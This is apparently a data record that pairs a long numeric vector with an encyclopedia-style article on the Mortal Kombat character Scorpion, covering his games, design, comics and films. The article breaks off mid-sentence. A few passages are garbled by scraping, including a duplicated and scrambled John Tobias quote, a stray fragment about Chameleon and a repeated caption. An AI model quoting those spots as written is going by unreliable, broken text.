0.00877559743821621, 0.008276976644992828, 0.0014137349789962173, 0.12876646220684052, 0.04659733548760414, -0.01925649121403694, -0.0993751809000969, 0.0693046823143959, 0.047426655888557434, 0.031752657145261765, 0.053081680089235306, 0.0030545343179255724, -0.029684575274586678, -0.08190333843231201, -0.029306843876838684, -0.032815515995025635, 0.02140318788588047, -0.018431808799505234, 0.049480244517326355, -0.03857967630028725, 0.005938410293310881, 0.0026285278145223856, 0.08389624208211899, 0.024875609204173088, 0.0043938616290688515, 0.045818179845809937, -0.06786966323852539, 0.03065533936023712, -0.026276038959622383, 0.06430429220199585, -0.026029204949736595, -0.0023303176276385784, 0.0052556367591023445, -0.06724600493907928, -0.014689122326672077, 0.03198877349495888, 0.01030333898961544, -0.04276570305228233, 0.033948712050914764, -0.04381444677710533, -0.02522803656756878, -0.03763539344072342, 0.10433773696422577, 0.04154378920793533, 0.03803468495607376, -0.1378667950630188, -0.05198894068598747, 0.05232568085193634, 0.045580409467220306, -0.07923125475645065, 0.07710206508636475, 0.052731312811374664, 0.07209063321352005, -0.01213904283940792, 0.07415971904993057, 0.04861097410321236, 0.013473663479089737, -0.0025060907937586308, 0.026027468964457512, -0.015924936160445213, -0.008722059428691864, 0.006318682339042425, -0.03920936957001686, 5.033349260785953e-33, 0.004546396434307098, 0.09627337753772736, 0.06141604110598564, -0.021494820713996887, -0.027383025735616684, -0.07223817706108093, 0.05794139578938484, 0.04723852872848511, -0.08898904174566269, -0.043329834938049316, 0.003013655776157975, 0.047978125512599945, -0.059778809547424316, -0.013165260665118694, 0.0041762241162359715, -0.07453776895999908, -0.02547476440668106, 0.02316163294017315, 0.05113277584314346, -0.007228926755487919, -0.047261569648981094, -0.01266196183860302, 0.01833953894674778, -0.05581112205982208, -0.05207767337560654, -0.026446307078003883, -0.01667010225355625, -0.04042255878448486, 0.11448202282190323, 0.04796421155333519, -0.046117354184389114, 0.06469234824180603, 0.010686792433261871, -0.056626610457897186, 0.08533210307359695, -0.004264352843165398, -0.14941388368606567, -0.037182390689849854, 0.08044727146625519, -0.009271101094782352, 0.005607456900179386, 0.022656835615634918, -0.07300006598234177, -0.030840398743748665, -0.03471504524350166, -0.010480779223144054, 0.014234093949198723, 0.05018015578389168, -0.025848858058452606, 0.009627393446862698, -0.013817043974995613, 0.006201217416673899, -0.1105773001909256, -0.05974194034934044, -0.0077558173798024654, 0.04980414733290672, -0.05252289026975632, 0.02929709106683731, 0.043285906314849854, -0.08548032492399216, -0.034890614449977875, 0.04992469772696495, -0.06662776321172714, -0.0596553310751915, -0.02869531139731407, 0.0704374611377716, -0.014926335774362087, -0.029191384091973305, 0.019067835062742233, -0.03096458688378334, -0.09097879379987717, 0.013580290600657463, 0.04955272376537323, -0.030767420306801796, 0.11769960075616837, 0.03261325880885124, 0.03583095595240593, 0.006912369281053543, -0.004163907375186682, -0.014011316001415253, -0.09974722564220428, -0.019874030724167824, -0.007752847392112017, 0.02529822662472725, 0.0119631914421916, -0.005601472221314907, 0.038895994424819946, -0.03663906082510948, 0.03261858969926834, -0.02545337565243244, -0.01152479276061058, -0.04110199213027954, 0.05017125979065895, 0.006854399107396603, 0.03172825276851654, -3.990404020304371e-33, 0.09954633563756943, -0.08809864521026611, -0.05656570941209793, 0.008793567307293415, 0.10247837752103806, -0.0024222400970757008, -0.10270200669765472, -0.02203858084976673, 0.09739050269126892, -0.10208068788051605, -0.06420961022377014, -0.06831315159797668, -0.012447555549442768, 0.028412524610757828, -0.008906467817723751, -0.05970490723848343, -0.008992831222712994, -0.033837269991636276, -0.008555762469768524, 0.03944932296872139, 0.0019092505099251866, -0.047090403735637665, 0.02936587668955326, -0.03619391843676567, 0.009872004389762878, 0.005866199266165495, -0.022062119096517563, 0.00008200333832064644, -0.03697718307375908, 0.01247321255505085, 0.03809649869799614, -0.020787915214896202, -0.025585247203707695, 0.014263753779232502, -0.08063891530036926, -0.022198371589183807, 0.04419621825218201, 0.02405693009495735, -0.006666706874966621, 0.07673420757055283, -0.033062152564525604, 0.02434845268726349, -0.012510059401392937, -0.05051601305603981, 0.021733520552515984, 0.038554977625608444, -0.008276049047708511, 0.03416784480214119, -0.027251651510596275, -0.010982373729348183, -0.03344385698437691, 0.016843972727656364, -0.008312767371535301, -0.0000631310322205536, 0.03575742989778519, 0.04151180386543274, 0.012524659745395184, -0.009223148226737976, 0.055025529116392136, 0.022977113723754883, -0.05929774418473244, 0.023963170126080513, -0.07218015193939209, 0.0014590767677873373, 0.05495472252368927, -0.031027156859636307, 0.049584176391363144, 0.05947468429803848, -0.04091687873005867, 0.006510682869702578, -0.06501081585884094, -0.041048258543014526, -0.036955252289772034, 0.006466320250183344, -0.0435296855866909, 0.05700388178229332, 0.05436940863728523, -0.006647288333624601, -0.005971464328467846, 0.014554164372384548, -0.03068496100604534, 0.015550119802355766, -0.02165430411696434, -0.008439631201326847, 0.12130945920944214, 0.10980232059955597, 0.0644233375787735, -0.08240380883216858, -0.001226792810484767, 0.03169647976756096, 0.0888134092092514, -0.00351881911046803, 0.039568331092596054, -0.017801379784941673, 0.073273204267025, -5.376633538389797e-8, -0.03672892600297928, 0.01999676041305065, -0.08197694271802902, 0.040159422904253006, 0.020031262189149857, -0.042209442704916, -0.01452737208455801, 0.06690524518489838, 0.046461641788482666, 0.05475465580821037, 0.015440395101904869, -0.02457258477807045, 0.06087108701467514, -0.03450757637619972, -0.009547168388962746, -0.03693201020359993, 0.12394355237483978, 0.016723139211535454, -0.0230849701911211, 0.0719771683216095, 0.026256756857037544, -0.019423920661211014, 0.12662017345428467, -0.016350429505109787, -0.020859813317656517, 0.05037762597203255, 0.06343410909175873, -0.14296962320804596, 0.06469667702913284, 0.02837926149368286, 0.01544206403195858, 0.0640919953584671, 0.01655006967484951, -0.12433969974517822, 0.060341089963912964, 0.017737356945872307, -0.044836875051259995, 0.04383429139852524, -0.04858854413032532, 0.07582274079322815, 0.10152117162942886, 0.02067086473107338, 0.02632390335202217, -0.03254125267267227, 0.06002604961395264, 0.018272891640663147, 0.032830610871315, -0.09040042012929916, 0.03238510712981224, 0.089935801923275, -0.018151743337512016, -0.034093353897333145, 0.009986698627471924, 0.018447240814566612, 0.06926722079515457, 0.06665337830781937, -0.01300358772277832, -0.03672293573617935, -0.05893056094646454, -0.03617275506258011, 0.11820407956838608, -0.0018562930636107922, 0.003860834753140807, 0.06865791976451874 ]
Scorpion (born Hanzo Hasashi) is a playable character and occasional boss character in the Mortal Kombat fighting game franchise created by Midway Games. Making his debut as one of the original seven playable characters in Mortal Kombat in 1992, he is an undead ninja specter seeking revenge for his own death at the hands of Sub-Zero, making him an anti-hero which has been his main role throughout the course of the series up until Mortal Kombat X but still remains neutral. Scorpion has been playable in nearly every Mortal Kombat fighting game, the one exception being the original version of Mortal Kombat 3. He was among the characters representing the series in the crossover games while having guest roles in other games, besides appearing in a variety of official series merchandise and other alternate media. Scorpion is featured on the logo of NetherRealm Studios, the successor of Midway Games. Appearances [ edit ] Mortal Kombat games [ edit ] "Scorpion" is the alias of Hanzo Hasashi, formerly one of the finest warriors of the Shirai Ryu, a Japanese ninja clan.[3] After he was killed by Sub-Zero, a member of a rival clan of Chinese assassins known as the Lin Kuei, Scorpion became a hellspawned revenant residing in hell (later the Netherrealm) and seeking vengeance against those responsible for the destruction of his clan and the death of his family, including his wife and his son. Although essentially neutral in allegiance, Scorpion will join forces with anyone who can assist his plans of revenge. He was once manipulated by Quan Chi, whom he promised his life in exchange for his impressive kombat abilities in order to defeat Sub-Zero.[1] In his initial backstory, displayed in the first game's attract mode, he is described only as having enmity towards Sub-Zero that was attributed to rivalries between opposing ninja clans. His ending revealed that he was actually an undead specter who had been killed by Sub-Zero and was survived by a wife and child.[4] This was further explored in a tie-in comic book written and illustrated by MK co-creator John Tobias and published by Midway; in a one-page scene, set aboard a junk en route to tournament host Shang Tsung's private island, Scorpion shocks Sub-Zero with his unexpected return exactly two years after his death, declaring that his "demons" had allowed him to return and avenge his demise, while he would not kill Sub-Zero there on the spot and instead wait until the tournament because he was "not a murderer."[5] After Goro's defeat at the hands of eventual champion Liu Kang, all hell breaks loose on the island, and Scorpion, one of only seven tournament survivors, teams up with Sub-Zero and the thunder god Raiden in holding back Shang Tsung's army, then kills Sub-Zero and disappears.[5] In Mortal Kombat II (1993), Scorpion learns that Sub-Zero has somehow returned, and plans to compete in the second tournament held in the otherworldly dimension of Outworld and hosted by the realm's emperor Shao Kahn. He tracks his nemesis down but notices, in the process, Sub-Zero sparing the life of an opponent in battle. Scorpion realizes that this is not the original Sub-Zero but instead his younger brother, who was sent to complete the elder Sub-Zero's failed mission of assassinating Shang Tsung. As a result, Scorpion vows to serve as the new Sub-Zero's guardian in atonement for killing his older brother.[6] In the 2005 beat 'em up spin-off Mortal Kombat: Shaolin Monks, set during the events of Mortal Kombat II, Scorpion is a boss character who attempts to kill the game's playable protagonists Liu Kang and Kung Lao. He appears in both masked and unmasked forms (the latter being named "Inferno Scorpion"). Mortal Kombat: Fire & Ice, which would have starred Scorpion and Sub-Zero in cooperative gameplay, was canceled when Paradox Development, the developers of Shaolin Monks, "couldn't do it in time and under budget."[7] Scorpion, along with all of the game's palette-swapped human ninja characters, was not playable in Mortal Kombat 3, but returned in the 1995 upgrade Ultimate Mortal Kombat 3 when Shao Kahn tries to conquer the Netherrealm after his invasion of Earth, and enlists the ninja in his forces. Scorpion's allegiance to Kahn quickly dissolves when he discovers, in a continuance of his MKII storyline, that Sub-Zero was one of Earth's chosen warriors, with whom he sided in their final showdown with Kahn.[1] Quan Chi is officially introduced into Scorpion's rivalry with Sub-Zero in the main MK storyline, starting with Mortal Kombat Mythologies: Sub-Zero (1997). Scorpion is featured therein as an unplayable boss character, appearing twice throughout the game. Despite playing a minor role, his background was officially expanded in a feature on the game's official website, where his real name and that of his clan were revealed, while his yellow outfit was described as an apparent mockery of the Lin Kuei, after former Lin Kuei member Takeda developed ninjutsu before leaving the clan and forming the rival Shirai Ryu.[3] He is enlisted by Quan Chi to find a map hidden in a Shaolin temple, a task the sorcerer also gives to Sub-Zero in order to engage the two rival ninjas in mortal combat. If the player performs a killer move on Scorpion, he will reappear as another boss later in the game. In Mortal Kombat 4 (1997), Quan Chi tricks Scorpion into believing that Sub-Zero was actually involved in the deaths of his family and clan, resulting in Scorpion allying with him. In Scorpion's ending, he emerges victorious over Sub-Zero, but Quan Chi then appears to reveal the truth about the death of Scorpion's family and clan. When Quan Chi then attempts to banish Scorpion back to the underworld, Scorpion grabs onto Quan Chi just as he is teleported, sending them both into the Netherrealm.[8] A variation of this ending was seen in Sub-Zero's conclusion, when Sub-Zero stands over a fallen Scorpion before being knocked down from behind by Quan Chi, who again reveals his scheme and claims that both ninjas were pawns for the fallen Elder God Shinnok, which results in Scorpion killing Quan Chi and finally declaring Sub-Zero free of his curse.[9] Scorpion's MK4 ending is carried over into Mortal Kombat: Deadly Alliance (2002), where he relentlessly hunts down Quan Chi but is attacked by the Oni Drahmin and Moloch, whom the sorcerer had hired as protection, and who later free him from the Netherrealm. In his noncanonical ending, Scorpion is killed when Drahmin and Moloch hurl him into the Soulnado, a magical tornado consisting of tormented souls trapped between Earthrealm and Outworld, but in his biography in Mortal Kombat: Deception, he is depicted as having escaped. He then meets the Elder Gods, which, coupled with his witnessing Raiden's death and the emergence of Onaga, the Dragon King, causes him to accept a new role as the Elder Gods' servant while working to prevent Onaga's merging of the realms. In the Konquest mode of Mortal Kombat: Armageddon (2006), Scorpion cuts a deal with the Elder Gods to serve them in exchange for the resurrection of the Shirai Ryu, along with the resurrection of his wife and son.[1] However, the Elder Gods resurrect them as undead beings. Enraged, Scorpion seeks to destroy the Elder Gods' chance of preventing Armageddon by taking Blaze's power that was meant for Taven or Daegon, but Taven defeats him and Scorpion is later killed by Sub-Zero in the free-for-all battle among the series characters in the game's opening sequence.[10] In the 2011 Mortal Kombat reboot, an alternative-timeline retelling of the first three titles, Scorpion reprises his role from the first game in seeking vengeance against the elder Sub-Zero, the difference being that he serves Quan Chi from the start, unaware that Quan Chi is the mastermind behind the Lin Kuei clan's murder of his family and clan. Raiden, attempting to alter the timeline of the events of the first three tournaments in hopes of averting Armageddon, talks Scorpion into sparing Sub-Zero's life on the grounds that he would seek to revive the Shirai Ryu in exchange. Scorpion agrees, and indeed when he defeats Sub-Zero in the Netherrealm, he refuses to kill him, but Quan Chi convinces Scorpion otherwise by replaying a graphic vision of the Lin Kuei's slaughter of the Shirai Ryu in addition to Scorpion's wife and child. Scorpion then reappears on the tournament grounds holding Sub-Zero's incinerated skull and spinal column aloft before letting it drop and shatter on the floor.[11] Later in the game, the younger Sub-Zero (formerly Tundra) seeks revenge for his brother's death by demanding a fight with Scorpion in Shao Kahn's arena, and Quan Chi grants the request. Scorpion immediately recognizes that this is not the original Sub-Zero but his younger brother, who defeats Scorpion but is apprehended by his clan before he can finish Scorpion off, and Scorpion teleports away during the confusion.[12] He was last seen when he appears to fight Raiden in the Netherrealm but loses against the Thunder God and disappeared.[13] In his game ending, the Shirai Ryu appear before him as ghostly apparitions and reveal the truth. They aid him in Scorpion's killing Quan Chi for his deception. In Sub-Zero's ending, he learns the truth about his and Scorpion's families and offers Scorpion a chance to join him in his quest for vengeance, with Sub-Zero and Scorpion joining forces to form the new Deadly Alliance.[14] In Mortal Kombat X, prior to his comic book prequel events, as well as his encounters with Kenshi to assist in his revival as a human and restore the Shirai Ryu as the clan's Grandmaster 25 years earlier, Scorpion still served Quan Chi. He was first seen in Johnny Cage's chapter of the game's story, allied with a now fleshed revenant Sub-Zero, killing most of the Special Force soldiers, except the high rank leaders Johnny, Sonya Blade and Kenshi, who manage to survive their assassination attempts thanks to Johnny's effort on defeating him and Sub-Zero. In story mode it is revealed that Scorpion's soul was restored to the living (along with Sub-Zero and Jax) by Raiden, who combined Quan Chi's magic with his own. Now Hanzo Hasashi once again, he reforms the Shirai Ryu clan and trains Kenshi's son, Takeda, in his fighting style. Hanzo made amends with Sub-Zero as Sub-Zero revealed that Quan Chi was responsible for the murder of Hanzo's family and clan. When the Special Forces capture Quan Chi, Hanzo and the Shirai Ryu subdue them, with Hanzo singlehandedly defeating Johnny Cage and Kenshi. Fueled by revenge, he was oblivious to Quan Chi's true plan, and ignored the Special Forces' hopes to return the other revenants to life. Freeing Quan Chi from imprisonment, Hanzo challenged Quan Chi to a final battle, with Hanzo emerging victorious. Concurrently, D'Vorah appeared after having betrayed Kotal Kahn and ended the Outworld Civil War, taking Shinnok's amulet from the now-dead Mileena. As Hanzo prepared to decapitate Quan Chi, D'Vorah throws the amulet to Quan Chi, who recites a spell to release Shinnok from the amulet. Immediately after the spell's conclusion, Quan Chi is killed, avenging Hanzo's family. However, Shinnok is returned to the physical world instantly, and Scorpion, in surprise, is immediately blasted away and knocked out by Shinnok. He is not seen again for the remainder of the story, leaving his fate, as well as many other characters, unknown. Other games [ edit ] Scorpion appears in the 2008 crossover title Mortal Kombat vs. DC Universe, participating in the war between the two titular franchises. In his ending, the essence of Dark Kahn finds a host in Scorpion's body, making him the most powerful being in the universe. Scorpion joined the cast of 2013's Injustice: Gods Among Us as a downloadable character. In his single-player battle ending, Scorpion, wondering how he ended up in this world, confronts Trigon, who summoned him out of anger that Scorpion had left his demon army and robbed him the glory of defeating the One-Earth High Councilor (Superman). Scorpion fights and defeats Trigon, and afterwards takes command over his demonic forces, which he plans to use to rule the world. Scorpion has also featured as a guest/cameo character in four non-fighting Midway Games titles: NBA Jam Tournament Edition (1995),[15] The Grid (2000),[16] MLB Slugfest: Loaded (2004),[17] and Psi-Ops: The Mindgate Conspiracy (2004).[18] Character design and gameplay [ edit ] MK] characters that can have the same impact? A: You can look at other franchises, like the X-Men for example, where there have been tons of new team members, but characters like Storm, Jean Grey, Professor X, MK will always have Scorpion and I don't think that's a bad thing. Q: Do you think it's possible to create new [] characters that can have the same impact?A: You can look at other franchises, like thefor example, where there have been tons of new team members, but characters like Cyclops Magneto , and Wolverine will always be the core of who they are. Can you replace them? Sure, but why? The X-Men will always have Wolverine andwill always have Scorpion and I don't think that's a bad thing. —John Tobias in 2012[19] Scorpion appeared in the first Mortal Kombat as one of two palette-swapped ninja characters along with Sub-Zero. His early origins were revealed by the series' original chief character designer John Tobias in September 2011 when he posted several pages of old pre-production character sketches and notes on Twitter. Scorpion and Sub-Zero were simply described as "[a] palette swap for 2 ninjas—a hunter and the hunted," while Tobias also considered the concepts of either one of them fleeing their clan, or a "revenge story" involving the then-unnamed characters being part of rival clans.[20] In regards to the game's strict memory limitations, co-creator and programmer Ed Boon recalled: "A lot of attention went into the economics of it, and so we knew that if we could take a character and change their color and use basically the same memory to create two characters, we'd save a lot of money and we'd have two characters." Scorpion was given a yellow palette with the developers deciding that it would symbolize fire as the exact opposite to Sub-Zero's ice blue, which "prompted the story behind them being these opposing ninja-clan-type characters."[21] A third ninja swap, Reptile, was added in the third revision as a hidden character who was outfitted in green and used Scorpion's spear (along with Sub-Zero's freeze) as part of his offensive arsenal; he was devised by Boon as "a cooler version of Scorpion."[22] The original costume was created from a modified ninja-like outfit bought at a Chicago costume shop[21] and was red for filming in the first game, but a different yellow one with a quilted vest and knee-high shin guards was utilized for Mortal Kombat II.[23] This in turn made the other male ninja characters therein—Sub-Zero, Reptile, and hidden characters Smoke and Noob Saibot—palette swaps of Scorpion, with the latter two also using Scorpion's spear when players fought them separately in secret battles. Scorpion and the ninja characters were first played by Daniel Pesina, who was replaced by John Turk for Ultimate Mortal Kombat 3 and the 1996 compilation Mortal Kombat Trilogy, while Sal Divita played the character in MK: Mythologies. While his ninja-outfit template from the first generation of games has remained relatively unchanged over time, the software technology of the post-Mortal Kombat 4 three-dimensional releases have allowed more detailed costuming for the characters, and Scorpion's costumes were duly enhanced with objects such as two katana swords strapped to his back and his spear attached to a rope tied to his belt in Deadly Alliance,[24] and a set of ornate shoulder epaulets in Deception, in which his alternate costume was a throwback to the two-dimensional MK titles. Scorpion's MK2011 costume is his most detailed to date and inspired by his namesake, such as the character's abdomen-shaped shoulder pads, the two stinger-handled swords crisscrossed on his back, and the exoskeletal pattern on his hard-shell face mask.[25] Scorpion was included with Sub-Zero, Reptile and Ermac in a bundle of classic costumes from the first Mortal Kombat that was released as downloadable content for the 2011 reboot.[26] For Injustice: Gods Among Us, he received a new costume designed by comic artist Jim Lee.[27] In the original Mortal Kombat's fighter-selection screen, Scorpion had regular human eyes, as his identity as a resurrected specter was meant to be a mystery, but he was given solid yellow or white eyes for every release thereafter starting with MKII,[27] while actors portraying Scorpion in live-action media such as the feature films and the Mortal Kombat: Legacy web series were outfitted with opaque contact lenses in order to achieve this effect. Scorpion yells one of two taunts at his opponents when he hits them with his spear. They were voiced by Boon in the games and both feature films, but only one of them ("Come here!") was included in the home ports of MK and MKII due to memory constraints. According to Boon, the second of the character's phrases originated because he thought "it would be funny to have him yell out 'Get over here!' when he [threw the spear]," and he was thus encouraged to get behind the studio microphone and record the taunts.[28] As confirmed by Daniel Pesina,[29] that phrase was originally an idea of Kano's actor Richard Divizio, as was Scorpion's skull face, inspired by the classic film Jason and the Argonauts.[30] Twenty years after the first MK game's release, Boon included creating the spear move as well as the character itself among his personal high points of the franchise's history, adding: "I remember people sitting in my office all day just doing this uppercut [on a speared enemy] again and again, like 'Oh my God, that feels so good.' It just became the cornerstone of [the game]."[31] MKII saw the debut of the popular phrase "Toasty!", which was voiced by series sound designer Dan Forden during a variation of Scorpion's "Flaming Skull" Fatality or at random when any of the game's characters landed an uppercut. According to Tobias, it first originated as "You're Toast!", which was a taunt bandied among the designers during game-testing sessions.[32] Scorpion's signature special move throughout the series has him hurling a harpoon-like spear (described as a kunai) at his opponents, making him the only other character besides Kano to have a physical weapon in the first Mortal Kombat. The spear, attached to a length of rope, impales his opponents through the chest and sets them up for a free hit as Scorpion then jerks on the rope to pull them in to close range. This move was designed by Pesina, who did not like the original lasso move as it reminded him of that of Wonder Woman,[29] and inspired by the ancient Asian weapons known as a rope dart.[30] His other incumbent special throughout the series, save for Deadly Alliance, has been his Teleport Punch, where he flies offscreen during battle and then reappears to strike his opponent from behind. Scorpion additionally gained a new leg-takedown maneuver in MKII that was not well-received (Sega Saturn Magazine called it a "ridiculous" move that "no one ever used").[33] He was considered a lower-tier character by GamePro in their 1993 MKII character rankings, rating him eighth out of the game's twelve playables and describing both him and Sub-Zero as "formerly a top-tier character [who] doesn’t have much of a chance in MKII since all of the male ninjas have some poor matchups," with Scorpion faring the worst against Jax and Mileena.[34] Ed Lomas of Sega Saturn Magazine described the character as having "simple yet effective" special moves in UMK3 that "make him good for beginners, [which] doesn't stop him from being a useful character," while his "trusty" spear was "perfect for setting up combos."[33] GameSpy, in their Deception walkthrough, described the character as "a well-rounded character that has strengths in combos as well as in special and normal moves."[35] They additionally described the spear as "useful as ever" in Armageddon, adding, "Between [that and his] other special moves ... Scorpion pretty much has everything covered."[36] Prima Games' MK2011 strategy guide considered Scorpion to be well-balanced with no distinct weaknesses or advantages, while winning more than half of his fights against the game's other characters.[37] He is also a playable character for both the versus and story modes in Shaolin Monks, where his move sets in this game are largely identical to Liu Kang's with some original techniques.[38] Scorpion's signature finishing move from the original game up until Mortal Kombat 4 was his "Fire Breath" Fatality, in which he removes his mask to reveal a skull right before immolating his opponent. A variation of this finisher was included in MKII: entering a different button/joystick combination added the spoken "Toasty!" phrase that simultaneously appeared on the screen. While the "Fire Breath" was brought back for Mortal Kombat vs. DC Universe in 2008, his spear has otherwise served as his primary tool in his Fatalities in the three-dimensional games, from impaling his opponents through the head and then decapitating them in Deadly Alliance, using it to yank off their limbs in Deception, and plunging it into their chest before kicking them through a portal that left nothing but a skinned corpse hanging from the spear's chain in MK2011 ("Nether Gate"). His second Fatality in the reboot, "Split Decision", had Scorpion using one of his back-mounted swords to hack his opponent to pieces. Scorpion would indirectly play a role in the fabrication of nonexistent character Ermac when Electronic Gaming Monthly published a doctored screenshot of Scorpion from the original game in 1993.a lot of other characters in MK1 like Chameleon uses his template [39] This subsequently spawned false player rumors of a glitch that would turn Scorpion's sprite red with the name "Error Macro" appearing in the energy bar.[40] Ermac became playable in UMK3, in which he was a red palette swap of Scorpion who shared his Teleport Punch. Other media [ edit ] Literature [ edit ] In Jeff Rovin's 1995 non-canon novelization, set before the first game, Scorpion plays a minor role and his backstory deviates from the games, as he is something of a combination of a father and son instead of an individual ninja specter. The father, a former Lin Kuei member turned tolltaker named Yong Park, was killed by Sub-Zero in front of Park's family and his body dumped into a canal. Yong's spirit merges with his young son Tsui's body in order for the latter to seek revenge under the form of Scorpion, during which his costume and armor magically appear on his body. When Scorpion challenges Sub-Zero to battle in hopes of avenging his father's murder, they do nothing more than exchange words before Sub-Zero sets off a smoke bomb and escapes. Scorpion never uses his spear aside from a scene in which he shoots it at a tree as a test shortly after his transformation.[41] With the exception of the novel, Scorpion has been portrayed in alternate Mortal Kombat media as an antagonist, and his spear was never used in any sort of graphic nature as in the games. In the Mortal Kombat series produced by Malibu Comics, he is simply a specter consumed by revenge against Sub-Zero, and his spear was changed to a weapon resembling a spiked morning star that was attached to a whip-long length of either chain or rope. An altered version of his confrontation with Sub-Zero from the Midway comic was expanded in the first issue of the 1994 Blood & Thunder miniseries, by way of a one-page flashback of their fateful battle that ends with Scorpion being killed off-panel.[42] Scorpion, along with the other series characters from the first game, seeks to solve all the riddles inside Shang Tsung's mystical tome, the Tao the Zhan, in order to gain absolute power (which no one accomplishes). In the third issue, the combatants are all imprisoned inside Shang Tsung's dungeon before Scorpion appears and frees them from their bonds,[43] and in the fourth issue, when the fighters are stranded in Outworld after Raiden frees them from the dungeon, Scorpion kills Hydro, a Lin Kuei companion of Sub-Zero created exclusively for the series. Sub-Zero then destroys Scorpion's mortal form in a quick battle, and Scorpion (now an apparition) is then driven off by Raiden, who then declares that Sub-Zero was now under his protection.[44] Scorpion was additionally featured in a special #0 issue as the centerpiece of a short story titled Kombatants, which was originally published prior to the miniseries and has him facing Sub-Zero once more as the other combatants sing his praises in the background.[45] The first page of the third issue of Blood & Thunder, which showed Scorpion hurling his weapon at an off-panel Sub-Zero, was a near-exact duplicate of Kombatants' title page.[46] During the "Tournament Edition" double-issue conclusion of the miniseries, Scorpion loses a fight to Kitana, who had stopped him beforehand from killing an unconscious Sub-Zero. In the 1995 Battlewave miniseries, Outworld emperor Shao Kahn returns Scorpion to the living world using a mystical gem called the Deathstone, which also allows Kahn to resurrect an army of undead soldiers under his control with Scorpion as his general; his army replaces the mutants that engrossed his ranks. One of the warriors under Scorpion's command was the twin-fighting monk duo Siang, who had been killed by Goro in the Blood & Thunder miniseries and was resurrected but still maintained a mind of his own, and therefore wanted to escape Kahn's control; Scorpion therefore fatally stabs Siang through the heart in a mercy killing before destroying the Deathstone.[47] In a 1995 one-shot featuring Baraka, titled "Babality", Scorpion still possesses the Deathstone and attempts to abduct an Outworld mutant baby who is under Baraka's protection, but he is thwarted by Noob Saibot before Baraka destroys the gem.[48] Film and television [ edit ] Mortal Kombat. His initial design had looked "nothing like in the games", but was changed later[49] Chris Casamassa as Scorpion in the 1995 film. His initial design had looked "nothing like in the games", but was changed later Scorpion was played by Chris Casamassa in the 1995 Mortal Kombat film. His rivalry with Sub-Zero is only mentioned in passing by Shang Tsung in the storyline, which instead had them both serving as his slaves under his command. Scorpion's spear was a living snake-like creature that shot from a slit in his palm and could fly to a limited extent. It is first seen when he engages in a standoff with Johnny Cage on Shang Tsung's ship, and later during his fight in the tournament against Cage that begins in a rubber tree forest, when the spear directly follows Cage until it goes completely taut with Cage just out of reach. Scorpion fires the creature a second time, but Cage dodges it and it fatally smashes into a tree. The fight continues in Scorpion's lair until Cage finally wounds Scorpion with several discarded weapons right after Scorpion performs his "Fire Breath" Fatality as an offensive move, causing Scorpion to burst into flames as he bleeds a glowing lava-like blood before exploding entirely. Scorpion's lair was constructed inside an airplane hangar and was not included in the script nor the movie novelization, in which Cage merely knocks Scorpion out in the forest with his Shadow Kick. In the 1995 animated film Mortal Kombat: The Journey Begins, Scorpion was again depicted as a henchman to Shang Tsung opposite Sub-Zero. On the sorcerer's orders, the duo fight Liu Kang, Johnny Cage, and Sonya Blade and come close to defeating them until Raiden intervenes and puts the fight to a halt. The backstory relationship of Scorpion and Sub-Zero is explored during the course of the film in a computer-animated fight sequence. He was the only character in the film who had no dialogue. Scorpion made one appearance in the 1996 animated series Mortal Kombat: Defenders of the Realm in the second episode ("Sting of the Scorpion"). His rivalry with Sub-Zero is vaguely explored, as no explicit mention is ever made of Sub-Zero killing him. Scorpion instead serves as an independent entity of evil who is first seen in a flashback sequence being banished to "the realm of lost souls" (designed to resemble his "Lair" stage in UMK3) for having died with dishonor, and has now returned to the land of the living to resurrect the dishonored dead in all realms, especially Shang Tsung. When Sub-Zero and Scorpion finally meet, Sub-Zero threatens to make Scorpion pay for the death of his clan but is defeated by a single kick to the solar plexus. Liu Kang beats Scorpion in Mortal Kombat in Sub-Zero's stead, and Raiden returns Scorpion back to the underworld as his undead army disappears. His spear was again a green snake-like head attached to a length of gold chain, which merely binds Liu Kang instead of impaling him before he breaks free. He was the lone ninja character in the show who never unmasked. Scorpion briefly returned in the 1997 sequel film Mortal Kombat: Annihilation, where he again worked for a higher power, this time Shao Kahn. Following a failed assassination attempt on Liu Kang and Kitana by Smoke and one of Kahn's extermination squads due to the unexpected interference of the younger Sub-Zero, Scorpion confronts the would-be targets, but ends up dueling Sub-Zero instead. After incapacitating Sub-Zero, he kidnaps Kitana and escapes through a portal. He was portrayed by J.J. Perry, who played Cyrax. Casamassa reprised his role from the first film in several episodes of the 1998-1999 TV series Mortal Kombat: Conquest with an origin different from that of the games. Scorpion commands his lover, Peron, to murder Sub-Zero's sister, and Sub-Zero kills Peron in retaliation, culminating in a duel which ends in a draw due to the arrival of Kung Lao, Siro, and Taja, who come to Sub-Zero's aid. Both Peron and Sub-Zero's sister were noncanonical characters created exclusively for the show. In the 2010 live-action short film Mortal Kombat: Rebirth, directed by Kevin Tancharoen, Scorpion, addressed therein by his real name, is depicted as a voluntary prisoner being questioned by Deacon City police captain Jackson Briggs regarding an underground tournament hosted by Shang Tsung. Sonya Blade shows up late in the film with a confidential document stating that Scorpion had killed Sub-Zero's brother. Knowing that Sub-Zero will enter Shang Tsung's deadly tournament, Scorpion agrees to participate and leave no one alive. He was played by Ian Anthony Dale and appears as a normal human, though his eyes are completely white and his signature weapon does appear. Dale reprised his role as Scorpion in both seasons of Tancharoen's Mortal Kombat: Legacy webseries. In a two-part episode in the 2011 first season, his story takes place in feudal Japan, when Hanzo Hasashi is the leader of the Shirai Ryu and a family man training his young son, Jubei, in combat, much to his wife's disapproval. Hanzo is later summoned to a meeting with the shogun, which turns out to be a ruse by Bi-Han (Sub-Zero) of the rival Lin Kuei clan in order to lure Hanzo away from his village and leave it open to attack, which Hanzo realizes after he finds the shogun murdered in the middle of an icy road. After subduing Sub-Zero in battle, he returns to his village to find his family slain before he himself is killed from behind by Sub-Zero. Shang Tsung appears with Sub-Zero, who reveals himself as Quan Chi. Quan Chi resurrects Scorpion as a specter and promises him revenge against Sub-Zero in exchange for his services. The dialogue of Scorpion, his family, and Sub-Zero were in Japanese with English subtitles, and the use of Scorpion's spear is faithful to the games for the first time in any alternate media in that it actually pierces Sub-Zero's chest before Scorpion reels him in for a hit, but no blood is shown. In the 2013 second season, a flashback shows that Hanzo and Bi-Han were childhood friends but driven apart by the mutual disdain of their clans. Two decades later, the Shirai Ryu and Lin Kuei have made some effort towards reconciliation, but Hasashi, while with his wife and son, encounters Bi-Han's younger brother, Kuai Liang, who provokes a fight and is killed by Hanzo offscreen. Hanzo and Bi-Han later meet to discuss the incident, and both are shown to be honorable men committed to maintaining the truce between their clans. Bi-Han swears that there will be no repercussions against the Shirai Ryu for Kuai's death, but after the events of 